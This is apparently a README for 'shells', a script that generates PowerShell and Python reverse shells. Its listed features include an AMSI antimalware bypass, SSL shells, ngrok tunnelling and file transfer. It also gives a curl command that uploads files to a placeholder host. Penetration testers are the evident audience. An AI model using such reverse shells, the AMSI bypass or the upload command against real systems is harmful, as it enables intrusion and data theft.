shells: Script for generating reverse shells
A script for generating common reverse shells fast and easy. Especially nice when in need of PowerShell and Python reverse shells, which can be a PITA getting correctly formatted.
- Shows username@computer.(domain), above the prompt and working-directory
- Has a partial and full AMSI-bypass.
- TCP, UDP, and SSL shells
- New custom TCP revshell!
- New custom SSL revshell!
- Reflective loading theart42’s amazing Sharpcat!
- Windows Powershell and Core Powershell
- Functions for uploading and downloading files. (Using Updog by sc0tfree)
- ngrok can be started/stopped from inside the script
- payloads will be generated with the ngrok addresses
- you can start/stop Updog from inside the script
- The PowerShell revshells have an upload/download function embedded
- To upload from nix using curl: curl -F path=”absolute path for Updog-folder” -F file=filename http://UpdogIP/upload
git clone https://github.com/4ndr34z/shells
Copyright (c) 2023 Andreas Finstad